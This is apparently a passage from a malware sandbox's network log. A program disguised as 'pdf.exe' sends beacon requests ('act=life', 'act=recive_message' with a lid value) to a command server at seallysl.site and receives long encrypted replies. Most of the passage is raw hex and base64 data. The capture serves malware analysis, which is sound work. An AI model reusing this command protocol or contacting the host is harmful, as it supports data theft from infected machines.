JUHJM\|j,)M69u-/AXFkWy&n_%42^@5\|k[FQ+\|3lm7"6q),hzlu}\X6%
2024-10-29 21:04:15 UTC	1378	IN	Data Raw: 9a 02 ee ac c5 29 80 b5 32 1f ac cd ed 67 2b 5c 0d b7 ba 22 cc 8b a7 2e 8d 7e f6 8f 5d 40 28 07 44 7b 06 35 b1 8f 3d fb d2 3c 42 3c ee 80 67 ca 06 7a f8 8a 0e d7 df 68 93 47 ed 1d 72 cf 65 c2 fa b2 00 ac 54 b4 78 97 6a 90 10 6b 41 d1 ec 8c d0 10 4f 19 41 8c 87 17 03 e1 93 02 c1 e0 82 53 ef da 6a 23 e5 19 4c 60 9a b0 6c 5d cc 20 bb 13 b7 5c 76 8c 12 45 c3 33 dd 8c 78 09 7e f4 97 6b 3a b1 a5 d2 31 ec c3 f5 62 22 b4 0c 0b 85 62 2f 9c 7b 8a 59 af 6b 2e db ff 9e 9f cb 10 5d 76 d8 ea b6 3e e4 c8 44 b7 69 8d 0a cf 3e de c4 55 c2 f0 78 e9 e9 1a 20 e2 78 70 b8 01 62 e9 19 e2 b5 1f d3 f8 c8 da 07 f7 af d3 a4 f2 24 31 0b da 39 47 62 be 20 4a b8 8f c0 4b 6e 1f 86 00 b8 c9 64 15 cf 13 37 e3 1f 11 11 48 e6 2a bc f6 58 ad 34 5d a7 54 16 85 01 07 f7 75 cc 69 26 92 cc 70 Data Ascii: )2g+\".~]@(D{5=<B<gzhGreTxjkAOASj#L`l] \vE3x~k:1b"b/{Yk.]v>Di>Ux xpb$19Gb JKnd7H*X4]Tui&p
2024-10-29 21:04:15 UTC	1378	IN	Data Raw: 55 a5 03 99 87 70 e4 95 70 18 80 de ee 9e 52 cb f8 0e 76 bd 04 97 49 98 80 c7 17 9a 67 37 0a a5 bc 74 05 82 9a 1f fe 26 57 82 b4 3f cd 35 8f 42 f5 0d b4 30 e0 9f 67 57 cf c6 86 58 6a 1a ca 70 bd 5d 49 54 74 42 20 4a c7 69 02 0a 1e 13 9b ab 45 a5 2f d4 65 d9 9f 75 82 91 ca 9f 0c 05 15 2d 06 09 ff 8d 1e 65 c1 df 61 a9 fc 26 55 7a c0 09 78 34 d0 b7 4e 9d b3 3b 0d 73 86 03 98 8f 3a 18 b2 6f 99 61 3c ae bc bf 7a e9 5b 20 75 68 4c 70 dd ff 49 7a f6 ae 38 40 31 33 89 ee 3c 75 89 2a f1 19 3a 74 24 28 92 f8 b9 aa ef 4d 67 c9 92 fc 67 27 31 f0 9d 62 3b 34 8c 68 2f 63 5e 9a 68 22 51 ab dd 2b 88 f9 a6 ac c5 2e 3f 2b 41 6b 23 28 89 25 41 f0 6a cb c7 90 0d a0 d3 6a e9 f1 cb f7 f5 3a c5 c7 b1 0c c8 e6 4a 86 42 4e 9d f4 1e 64 3d f8 5c 99 0a c5 d2 cb ac 6c 6f 64 c9 ea bd Data Ascii: UppRvIg7t&W?5B0gWXjp]ITtB JiE/eu-ea&Uzx4N;s:oa<z[ uhLpIz8@13<u*:t$(Mgg'1b;4h/c^h"Q+.?+Ak#(%Ajj:JBNd=\lod
2024-10-29 21:04:15 UTC	1378	IN	Data Raw: de 5c ea 72 a6 6f a7 5b d2 4f d9 b6 8c 68 a1 62 d4 43 d1 dc 65 d6 1b 4d fc 89 4f 98 36 02 f3 40 26 08 12 57 97 7e 11 d4 d0 0a 9f 49 7d 59 4f 5c 61 46 85 93 c6 b6 d0 63 9c 9a d1 cc 47 9a 81 7a 82 f5 16 8d cb e5 0a 69 b5 34 a5 e4 a1 6c d7 1a 94 87 03 64 3c cf 2c 65 d4 92 f4 f2 87 98 f9 36 f0 2a 9f bf a4 e3 fb 44 79 82 7b d7 2f 2b cb 24 4e 50 41 52 83 5c d8 5a 26 f8 77 a5 ab da 59 db cd 3b 80 f1 00 2c 19 0e 3f c7 41 b9 c8 51 d1 ca 93 70 d2 8e 6c a3 12 af e0 58 27 f6 88 7b b3 63 0b fe 65 17 8d 1f aa 35 ab ed 1a 17 f5 61 f3 62 08 96 73 8b 4c 1b 29 65 59 24 4a 46 67 0d de 4d 1a bc 26 1e d7 32 4d f8 a6 21 b8 03 0b ff 0b da 1b b4 fc 03 89 42 c4 ea 17 26 ae 2b f4 e3 b6 35 70 7c 29 2d ea dc e4 28 77 b6 64 8f 26 7e ab 5e bc cc ca 7b 21 f7 d7 69 b9 05 50 33 c5 1c e6 Data Ascii: \ro[OhbCeMO6@&W~I}YO\aFcGzi4ld<,e6*Dy{/+$NPAR\Z&wY;,?AQplX'{ce5absL)eY$JFgM&2M!B&+5p\|)-(wd&~^{!iP3
2024-10-29 21:04:15 UTC	1378	IN	Data Raw: f3 9d 82 11 fa 82 77 d5 f5 d6 88 d0 f6 a5 24 bd 8d 84 7d 57 71 29 51 90 94 65 f2 8d a4 86 32 46 12 d5 bb 03 a2 8e 65 4c b7 06 3f 94 a1 9d 57 ae 5e a9 e9 c3 6c ae d5 ec 93 c1 a4 3e 5f 09 47 18 f1 40 94 00 9e ee 0c f6 ab 2b 61 36 05 ca 12 33 35 80 a8 07 1c c0 82 32 84 8c 7c 27 6b 83 55 8e 82 82 27 ec 28 e1 50 dc 65 00 b2 2b 31 ca 0e 3b 25 17 6e a1 31 77 be db 12 91 ce e3 6b a9 25 b2 8c ed 96 35 d1 10 be b7 60 67 e4 90 d2 12 a2 d0 24 96 a6 89 b9 8c dc c0 8b a5 8a 27 6e 52 1b 4b 2a 5a e6 e7 e5 6e 1a 08 01 e4 32 18 ac fd 1a 01 ef 37 0e ff d6 dd 04 40 bd a3 d7 e9 58 49 cb c1 2e 15 2f 9b e8 f9 76 d5 46 fa 3a b0 6f 05 97 bf 04 38 d0 c5 a5 0e 1c 64 1c f3 49 ee 0f 6d d1 7f 56 94 b0 9b 37 bb b3 d5 55 82 eb ea da 58 4a 04 0a 74 f3 d8 42 8f ad 89 65 a6 6c 1b 11 8f 09 Data Ascii: w$}Wq)Qe2FeL?W^l>_G@+a6352\|'kU'(Pe+1;%n1wk%5`g$'nRK*Zn27@XI./vF:o8dImV7UXJtBel
2024-10-29 21:04:15 UTC	1378	IN	Data Raw: fc dd 18 0b 58 df 98 8c 0e 66 40 01 9e 80 49 4e 2e 4f 55 b4 e3 ce 71 ae 02 28 9d 9c 30 97 bf 5a cf 22 98 35 8b 24 05 6d da 00 4c 29 e8 c1 b7 82 bb 2a 56 3c 57 28 bd 47 47 dd 4d 56 0b 04 02 c2 c4 42 ae 3d 36 2a 08 73 f8 22 4d 30 45 1a a8 a5 bb 04 09 2e bc f3 7f 4b 76 fb 83 fc aa 1b c9 aa db ca b0 9f 4e a8 07 8d 49 47 2f b3 fe 81 70 95 6e 0d bc 84 81 a5 66 ab 41 69 e4 92 e4 3e 5f 50 35 d2 4f e1 3d d7 ac a1 f2 8c b0 fe 35 a6 ae 81 a2 66 57 5f 2d 4d df 38 e6 09 6e b6 b3 52 c1 97 14 b2 d1 1b f8 b5 30 36 82 36 cd c3 e7 83 f6 07 f9 1b 9e a4 26 64 8c 96 99 ea b8 22 d9 b1 e0 a2 1e 65 0c fc 24 1e 42 3a f2 a1 99 63 7c d3 50 ef 0e ae 93 aa 8f a0 62 a5 98 49 69 4c f4 8b 55 e3 4d 48 09 34 af 3c 8c 1b d0 ee 69 79 0c f2 ba b4 fa 78 36 0b 85 33 b5 9e a8 8b ea 9f 57 d9 59 Data Ascii: Xf@IN.OUq(0Z"5$mL)V<W(GGMVB=6s"M0E.KvNIG/pnfAi>_P5O=5fW_-M8nR066&d"e$B:c\|PbIiLUMH4<iyx63WY
2024-10-29 21:04:15 UTC	1378	IN	Data Raw: 6f 89 3a 02 bf e1 de 6d 64 d9 0a 3b 3b 64 15 4f 37 b1 67 fc e2 64 e1 25 f6 80 b5 7d 52 56 12 ef ce b6 1c 16 8e 78 a2 95 43 40 51 54 42 59 43 ac 2c 70 b7 ac 3f 43 c7 96 9e a9 96 89 f1 c2 fc a0 26 9f fe a3 22 50 93 79 8c 2b b3 37 14 55 1f a5 70 80 66 92 f9 e1 0f 30 d2 97 61 b2 0f 67 83 b5 6d ea 47 10 86 dc 43 fe db c4 c5 46 f4 b3 98 fa 07 d0 06 d6 1f 0d 03 cb 61 56 27 66 c1 ac 12 46 39 e2 96 e5 c3 27 d2 81 01 e8 61 04 85 44 b6 21 ad 06 be 41 1b 61 4a 05 9f b3 c6 64 6e cc 6d 07 1a ab 69 cb 2b ec d3 8c f8 60 a1 53 c1 16 02 79 6e 45 f7 38 8b 81 81 d3 4e 3f 8c 0d 60 ce fa d1 3d d9 ff c2 22 90 ad e4 86 0d ab 38 c8 ed 0a 9a 1c df cc e2 62 9e 22 f3 02 02 11 12 94 b1 94 fa ab 03 3b 77 21 73 1b 3f e8 2c 98 ca 83 45 a9 d4 e8 66 98 9b 59 c1 27 a2 f9 de 35 d6 42 73 21 Data Ascii: o:md;;dO7gd%}RVxC@QTBYC,p?C&"Py+7Upf0agmGCFaV'fF9'aD!AaJdnmi+`SynE8N?`="8b";w!s?,EfY'5Bs!
2024-10-29 21:04:15 UTC	1378	IN	Data Raw: f9 3a 14 7f 20 f5 95 3e 06 e3 90 81 e4 6e 09 35 f4 f9 fb d1 3e cd f4 b5 46 43 da 02 e3 fc 30 b7 22 65 ae cf 9c 04 80 44 90 85 26 00 5c bc 95 2a e6 7e f5 9f a8 b5 66 64 77 f9 0d 3f 48 20 b7 aa f2 18 04 1a f3 92 a6 b0 74 68 a5 b4 a7 fe 06 d6 ab be 8a 41 73 4c db fb d3 4a 12 25 93 2d 61 79 f7 96 ff d7 d2 e3 f1 9b e8 6c a5 a5 3d dd ee 40 cf b0 22 9e f1 2f aa 3b 03 b4 00 dc 2e 78 75 91 fc 7c fa 73 c9 ba 88 9b c6 d2 9f b9 4b f6 54 67 4f f8 71 2e dd 1b 7d 5d ac f5 60 07 08 8d df 35 c3 5a 3e 3d 51 12 36 37 4f 7a ba 2b 36 3e 72 07 af a1 5e 5a 71 cd 30 d8 8a 50 c3 14 9c cf 90 91 9c 4f 43 2b 52 dc fc b8 b9 32 b5 db 1e 77 52 5b e2 7c 78 b5 e8 19 f8 31 c4 70 57 06 52 d0 31 f1 a5 e1 94 52 9f 21 08 2b 07 98 b4 76 5c 4e be 5b 38 1b 47 97 d2 21 81 f1 e8 a1 72 09 15 84 91 Data Ascii: : >n5>FC0"eD&\*~fdw?H thAsLJ%-ayl=@"/;.xu\|sKTgOq.}]`5Z>=Q67Oz+6>r^Zq0POC+R2wR[\|x1pWR1R!+v\N[8G!r
2024-10-29 21:04:15 UTC	1378	IN	Data Raw: 8e 0f d2 ab ed 90 34 fa a3 11 5d 9e 3e a7 1f 38 22 72 a0 69 79 4f 80 0a e9 0c 35 7e e4 3c 32 8e a5 5b f3 b8 1b 5f 83 47 b9 0b 48 e2 14 4f 01 e7 3f fa 12 4d 28 7e f5 60 8c 47 de 2a 9a 12 00 b4 cb 9d c9 1b 7c 44 e7 1b 90 87 c4 c9 06 4f 7f 5e f2 fa f7 e3 f1 64 a3 f1 a8 c1 b9 92 d4 86 81 65 f7 cc 60 57 8c b3 c2 ae eb 06 97 97 b3 04 08 93 de 8b 8c ae 5f a5 07 52 56 b9 43 ea 24 d0 06 4c 22 3a a1 a9 1f ad 38 8c b4 2e 48 c2 c6 c1 72 5b d1 5e 7a 01 32 6f c9 57 c0 3f e6 47 9a f0 4f 77 5d 6f 15 9a df ad c0 8b 44 3d 36 d1 35 ef 53 f6 09 eb 0e d4 ef ee de bf b7 b3 6e 55 0b 3a 45 75 8b 38 7d a0 a7 0b 18 c6 de 35 67 2c 34 78 20 4e 16 01 f1 48 2d 7b 21 e8 90 49 f9 b8 3d b3 86 d3 79 82 d5 6e 2a 26 83 fa b7 ea 10 6c ff da 43 9c e0 68 e6 a1 f3 17 7d e6 33 e7 93 4b dc 3b 9d Data Ascii: 4]>8"riyO5~<2[_GHO?M(~`G\|DO^de`W_RVC$L":8.Hr[^z2oW?GOw]oD=65SnU:Eu8}5g,4x NH-{!I=yn&lCh}3K;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	172.67.180.76	443	7980	C:\Lipras\pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 21:04:23 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: seallysl.site
2024-10-29 21:04:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-29 21:04:23 UTC	1010	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 21:04:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mhnb5d9vgvfd6p9lirkn2j1m2v; expires=Sat, 22 Feb 2025 14:51:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xXvMauYirzxJoaw1Qs%2FJod44DEtagGcLzKR5e2%2BEla0bq3ao1O8n0JDlbylaGdMiuI953Ta%2B0pEU3BLKI68T1Lozbb%2BYaI3xviSh3%2Bf1V%2BJNDLduR2m4NR39S6F%2FQYrf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da61e20880aafc5-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20117&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=904&delivery_rate=143309&cwnd=32&unsent_bytes=0&cid=62ed00179285e1db&ts=537&x=0"
2024-10-29 21:04:23 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-29 21:04:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	172.67.180.76	443	7980	C:\Lipras\pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 21:04:24 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: seallysl.site
2024-10-29 21:04:24 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 67 33 39 32 73 4d 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=g392sM--&j=
2024-10-29 21:04:24 UTC	1009	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 21:04:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t4cs1o7mac1m36dh79jrnu19s5; expires=Sat, 22 Feb 2025 14:51:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJMjr9zLX9QjI8%2FezAnBmbO6CgJVgxQ5ErN%2BN9wkVyvtBHV2Crhl0rqNLAs4o9AIAYif%2BvTTohWfyX%2B9I7VoqWKFdLlF5hsUpNDZqj15myTC%2FrXZ3bBufiL%2FMQFmRQaz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da61e2788022c91-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1560&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=939&delivery_rate=1841068&cwnd=248&unsent_bytes=0&cid=2385016eff199a0c&ts=743&x=0"
2024-10-29 21:04:24 UTC	360	IN	Data Raw: 34 34 36 63 0d 0a 47 4f 2b 72 78 63 79 52 36 67 54 34 2b 62 63 53 6a 4c 54 43 72 76 64 64 73 36 62 74 51 79 37 64 4b 6f 2f 36 6b 53 47 32 54 36 68 6a 7a 64 33 6e 39 71 58 47 4a 6f 75 63 6c 53 6a 34 78 72 66 4c 32 33 2f 53 77 73 39 35 53 4c 78 47 2f 4a 2b 39 41 38 41 69 69 69 4b 4a 79 71 6d 2f 39 4d 59 6d 6e 59 47 56 4b 4e 66 50 34 4d 75 5a 66 34 6d 45 69 43 6c 4d 76 45 62 74 6d 2f 70 4f 78 69 50 4c 63 49 50 4d 72 61 6e 79 6a 6d 57 55 6c 4e 4a 33 36 64 57 6f 77 4a 34 77 32 38 76 50 62 77 79 34 55 4b 33 41 73 32 7a 54 4f 38 6c 56 6a 74 69 75 37 75 7a 47 66 39 71 63 32 54 43 32 6c 71 50 4c 6c 54 48 56 77 6f 59 72 52 72 56 4f 37 4a 37 37 55 64 38 70 77 48 43 4e 7a 36 79 6a 2b 35 70 6f 6e 70 50 5a 63 65 50 56 34 49 4c 56 4f 4d 6d 45 31 32 45 66 6a 55 76 38 69 Data Ascii: 446cGO+rxcyR6gT4+bcSjLTCrvdds6btQy7dKo/6kSG2T6hjzd3n9qXGJouclSj4xrfL23/Sws95SLxG/J+9A8AiiiKJyqm/9MYmnYGVKNfP4MuZf4mEiClMvEbtm/pOxiPLcIPMranyjmWUlNJ36dWowJ4w28vPbwy4UK3As2zTO8lVjtiu7uzGf9qc2TC2lqPLlTHVwoYrRrVO7J77Ud8pwHCNz6yj+5ponpPZcePV4ILVOMmE12EfjUv8i
2024-10-29 21:04:24 UTC	1369	IN	Data Raw: 44 65 64 66 7a 64 71 63 47 59 50 39 7a 4f 67 43 4a 4d 75 45 4c 6e 6c 2f 6c 48 32 53 44 4d 65 6f 32 4a 36 65 37 30 6b 43 62 43 32 2f 5a 31 2f 74 47 73 32 74 63 46 6b 64 76 42 4f 41 79 34 52 4b 33 41 73 30 76 52 4c 73 6c 78 67 73 71 76 70 65 47 49 64 4a 79 57 30 47 4c 6f 30 36 37 47 6c 69 33 62 79 6f 6b 69 52 62 52 42 36 4a 2f 33 41 35 70 74 7a 57 4c 4e 6b 65 65 50 2f 6f 4e 71 6b 49 7a 56 4d 50 47 59 75 59 79 53 4d 35 47 63 7a 79 56 4e 75 30 6e 70 6c 76 31 48 32 43 76 45 64 34 4c 50 72 61 37 30 67 6d 36 53 6d 74 68 37 34 64 61 6c 77 5a 45 35 33 63 57 4b 59 51 4c 2f 54 2f 58 59 71 77 50 36 4b 73 6c 6f 7a 2f 79 6b 6f 50 32 50 63 4e 71 45 6d 32 6d 75 30 61 79 4d 7a 58 2f 66 77 59 41 7a 54 61 31 4e 34 34 72 2f 52 74 49 67 79 58 53 4e 7a 4b 43 6a 2f 59 35 68 6d Data Ascii: DedfzdqcGYP9zOgCJMuELnl/lH2SDMeo2J6e70kCbC2/Z1/tGs2tcFkdvBOAy4RK3As0vRLslxgsqvpeGIdJyW0GLo067Gli3byokiRbRB6J/3A5ptzWLNkeeP/oNqkIzVMPGYuYySM5GczyVNu0nplv1H2CvEd4LPra70gm6Smth74dalwZE53cWKYQL/T/XYqwP6Ksloz/ykoP2PcNqEm2mu0ayMzX/fwYAzTa1N44r/RtIgyXSNzKCj/Y5hm
2024-10-29 21:04:24 UTC	1369	IN	Data Raw: 75 30 61 79 4d 7a 58 2f 64 7a 59 38 71 52 72 74 49 36 70 58 32 51 4e 4d 75 78 33 32 48 78 36 43 71 2f 34 46 72 6e 4a 76 53 64 4f 76 45 70 63 57 5a 4d 35 47 4b 7a 79 5a 55 2f 78 43 74 74 2f 52 56 31 77 4c 4a 61 34 53 4a 75 4f 44 71 79 47 47 57 32 34 30 77 36 64 4f 6f 78 35 4d 33 30 64 61 4b 4c 30 65 2b 51 75 75 5a 2f 6b 2f 53 4c 63 74 36 69 38 57 6e 71 66 53 61 64 4a 2b 64 78 33 71 75 6d 4f 44 4c 6a 58 2b 4a 68 4c 6b 78 57 36 35 65 72 36 33 77 54 64 6f 71 33 44 71 53 68 37 37 75 39 49 51 6d 77 74 76 65 63 4f 4c 52 71 4d 71 52 4e 39 37 4c 68 6a 4e 4e 73 30 62 2f 6e 2f 4e 4b 32 69 4c 47 63 34 44 4f 71 71 58 35 68 57 4b 64 6d 70 55 2b 72 74 47 34 6a 4d 31 2f 35 39 53 43 4c 57 4b 30 52 4f 54 59 37 41 33 4e 62 63 31 32 7a 5a 48 6e 71 76 2b 41 62 4a 57 53 33 33 Data Ascii: u0ayMzX/dzY8qRrtI6pX2QNMux32Hx6Cq/4FrnJvSdOvEpcWZM5GKzyZU/xCtt/RV1wLJa4SJuODqyGGW240w6dOox5M30daKL0e+QuuZ/k/SLct6i8WnqfSadJ+dx3qumODLjX+JhLkxW65er63wTdoq3DqSh77u9IQmwtvecOLRqMqRN97LhjNNs0b/n/NK2iLGc4DOqqX5hWKdmpU+rtG4jM1/59SCLWK0ROTY7A3Nbc12zZHnqv+AbJWS33
2024-10-29 21:04:24 UTC	1369	IN	Data Raw: 79 70 70 2f 6e 34 53 49 4f 51 7a 6e 43 4d 4b 2f 78 67 48 31 46 34 70 6c 77 39 44 6e 71 66 2f 49 50 74 71 58 31 6e 7a 6d 32 61 62 46 6d 54 58 59 7a 34 4d 71 53 4c 4e 42 36 4a 37 79 52 74 45 73 7a 6e 61 48 7a 36 53 74 2f 49 64 70 6b 74 75 62 4d 4f 6e 4f 34 4a 54 56 47 73 62 50 67 53 63 4d 6f 41 62 30 32 50 52 50 6c 48 57 4b 64 6f 54 50 6f 61 76 2f 69 57 43 53 6e 74 31 30 37 39 43 6d 7a 35 6f 37 31 4d 57 41 4a 55 43 78 51 75 79 5a 2f 30 6a 62 4a 73 38 36 77 34 6d 67 74 72 50 51 4a 71 75 59 77 32 66 2b 32 75 44 54 32 79 61 52 77 34 4e 68 46 50 39 4a 2f 35 4c 35 54 64 45 69 7a 33 6d 43 7a 71 71 6f 2f 34 4a 76 6b 70 33 61 65 66 7a 56 72 4d 4b 53 4d 64 33 4b 67 69 74 50 73 67 69 6a 32 50 52 62 6c 48 57 4b 56 6f 72 45 69 61 58 2f 6a 79 61 46 31 63 77 77 36 64 72 Data Ascii: ypp/n4SIOQznCMK/xgH1F4plw9Dnqf/IPtqX1nzm2abFmTXYz4MqSLNB6J7yRtEsznaHz6St/IdpktubMOnO4JTVGsbPgScMoAb02PRPlHWKdoTPoav/iWCSnt1079Cmz5o71MWAJUCxQuyZ/0jbJs86w4mgtrPQJquYw2f+2uDT2yaRw4NhFP9J/5L5TdEiz3mCzqqo/4Jvkp3aefzVrMKSMd3KgitPsgij2PRblHWKVorEiaX/jyaF1cww6dr
2024-10-29 21:04:24 UTC	1369	IN	Data Raw: 35 48 79 69 44 46 63 76 41 72 63 6a 76 42 56 33 79 44 47 4f 70 4b 48 76 75 37 30 68 43 62 43 32 39 4e 2f 35 39 57 76 7a 5a 77 7a 33 4d 47 47 4a 45 32 35 54 4f 65 53 38 30 58 53 4c 4d 39 77 6a 73 69 74 70 2f 53 41 59 5a 6d 4a 6c 54 36 75 30 62 69 4d 7a 58 2f 34 77 35 30 76 58 50 39 58 6f 34 47 7a 52 4e 68 74 6b 6a 71 4a 77 36 69 71 39 49 52 67 6e 35 33 59 63 65 48 58 6f 4d 4f 52 4e 4e 6a 43 6a 69 78 4a 73 6b 7a 2f 6b 76 68 4d 32 43 54 47 64 38 32 48 35 36 6e 72 79 44 37 61 71 74 68 2b 34 4e 47 32 6a 49 70 78 79 49 53 49 4c 51 7a 6e 43 4f 79 55 2f 45 44 62 4c 73 6c 37 68 39 75 31 6f 76 71 41 59 35 61 51 32 33 62 38 30 4b 2f 46 6c 6a 7a 59 77 34 63 74 52 72 78 50 72 64 61 7a 52 4d 78 74 6b 6a 71 75 33 72 65 6a 73 35 63 6f 67 39 76 53 66 4b 36 4f 34 4d 53 59 Data Ascii: 5HyiDFcvArcjvBV3yDGOpKHvu70hCbC29N/59WvzZwz3MGGJE25TOeS80XSLM9wjsitp/SAYZmJlT6u0biMzX/4w50vXP9Xo4GzRNhtkjqJw6iq9IRgn53YceHXoMORNNjCjixJskz/kvhM2CTGd82H56nryD7aqth+4NG2jIpxyISILQznCOyU/EDbLsl7h9u1ovqAY5aQ23b80K/FljzYw4ctRrxPrdazRMxtkjqu3rejs5cog9vSfK6O4MSY
2024-10-29 21:04:24 UTC	1369	IN	Data Raw: 41 6f 52 62 74 41 37 70 6a 33 52 39 4d 6f 79 58 61 47 7a 71 53 68 39 34 46 6f 6b 35 53 56 50 71 37 52 75 49 7a 4e 66 2f 44 66 6a 43 31 42 2f 31 65 6a 67 62 4e 45 32 47 32 53 4f 6f 48 48 6f 71 37 35 6a 6d 4b 66 6e 64 39 31 37 74 32 6a 77 35 45 35 31 63 75 50 4b 6b 57 2b 54 75 69 53 2b 45 58 5a 4c 73 78 38 7a 59 66 6e 71 65 76 49 50 74 71 37 7a 6e 33 69 30 65 44 54 32 79 61 52 77 34 4e 68 46 50 39 44 34 5a 7a 30 51 39 6b 75 77 6e 2b 4a 77 36 4b 75 2b 35 70 75 6d 70 7a 48 59 75 37 66 70 63 43 57 50 39 58 43 68 69 64 50 75 77 69 6a 32 50 52 62 6c 48 57 4b 56 34 48 4f 6a 71 6e 6f 79 48 6e 55 67 70 56 33 34 70 62 34 6a 4a 51 30 32 38 75 43 49 6b 71 38 51 2b 69 53 38 6b 54 63 49 4e 68 35 67 73 61 6a 72 76 79 4f 59 4a 75 55 30 33 66 6e 31 36 6a 4c 31 58 47 52 77 Data Ascii: AoRbtA7pj3R9MoyXaGzqSh94Fok5SVPq7RuIzNf/DfjC1B/1ejgbNE2G2SOoHHoq75jmKfnd917t2jw5E51cuPKkW+TuiS+EXZLsx8zYfnqevIPtq7zn3i0eDT2yaRw4NhFP9D4Zz0Q9kuwn+Jw6Ku+5pumpzHYu7fpcCWP9XChidPuwij2PRblHWKV4HOjqnoyHnUgpV34pb4jJQ028uCIkq8Q+iS8kTcINh5gsajrvyOYJuU03fn16jL1XGRw
2024-10-29 21:04:24 UTC	1369	IN	Data Raw: 34 57 4f 71 50 2f 41 4f 61 62 63 55 36 31 66 44 6e 70 2f 53 54 64 34 79 57 78 58 65 75 36 65 36 4d 6a 58 2b 4a 68 4c 6f 69 51 72 46 50 2b 34 6d 2b 5a 4d 49 6e 7a 57 71 4b 33 71 6a 75 76 63 68 67 32 73 4f 47 50 71 37 53 73 59 7a 4e 62 34 4f 66 32 6e 49 62 37 78 72 79 31 75 6f 44 77 6d 32 53 4b 4d 4f 4a 74 65 36 72 79 43 47 5a 69 63 64 32 37 63 43 6a 69 36 73 42 39 74 36 43 4a 31 75 75 64 74 4f 66 36 55 37 53 4f 74 73 32 6d 4d 71 70 6f 50 53 65 4a 74 54 62 32 6a 43 32 37 2b 43 45 31 51 43 66 68 4a 64 68 46 50 39 39 37 70 62 39 52 4d 49 38 68 31 32 58 78 4b 47 35 34 73 67 6f 32 70 32 56 4b 4c 36 59 34 4d 69 45 66 34 6d 55 33 58 6f 5a 37 42 2b 39 79 75 77 4e 7a 57 33 63 4f 74 57 62 36 65 37 68 79 44 37 61 33 4e 5a 69 2f 4e 43 6a 32 70 5a 34 37 2f 71 68 4a 6b Data Ascii: 4WOqP/AOabcU61fDnp/STd4yWxXeu6e6MjX+JhLoiQrFP+4m+ZMInzWqK3qjuvchg2sOGPq7SsYzNb4Of2nIb7xry1uoDwm2SKMOJte6ryCGZicd27cCji6sB9t6CJ1uudtOf6U7SOts2mMqpoPSeJtTb2jC27+CE1QCfhJdhFP997pb9RMI8h12XxKG54sgo2p2VKL6Y4MiEf4mU3XoZ7B+9yuwNzW3cOtWb6e7hyD7a3NZi/NCj2pZ47/qhJk
2024-10-29 21:04:24 UTC	1369	IN	Data Raw: 6c 76 52 56 78 57 44 74 64 49 72 49 73 62 37 6b 68 79 62 55 32 39 4d 77 74 6f 54 75 6a 4a 45 75 6b 5a 7a 66 63 78 66 71 47 37 72 49 6f 56 79 61 4e 49 70 73 7a 5a 48 31 34 4c 4f 61 4a 73 4c 62 6b 6e 50 38 78 4b 62 50 67 7a 79 57 2b 72 45 47 51 72 68 4a 2b 34 6a 6b 54 4a 73 44 2f 46 75 7a 39 37 4b 74 2f 59 5a 68 6a 49 71 56 50 71 37 5a 34 4a 53 73 66 35 6d 45 73 47 38 4d 70 77 69 31 32 4d 5a 41 32 69 50 4e 62 4a 79 45 67 4b 44 30 69 58 43 4b 6a 4e 6f 2f 77 4f 43 42 6a 4e 74 2f 31 34 54 58 63 77 4c 2f 54 50 7a 59 71 78 4f 47 64 70 38 70 32 70 6e 31 73 62 32 52 4a 6f 7a 62 6a 53 4b 67 6c 72 4b 4d 7a 58 2b 57 78 35 30 7a 53 72 78 65 37 74 2f 4e 66 66 4d 6a 7a 58 75 62 32 61 71 69 30 6f 74 33 6b 4b 58 72 5a 65 33 59 72 73 75 44 4c 70 47 4b 7a 79 34 4d 35 33 47 Data Ascii: 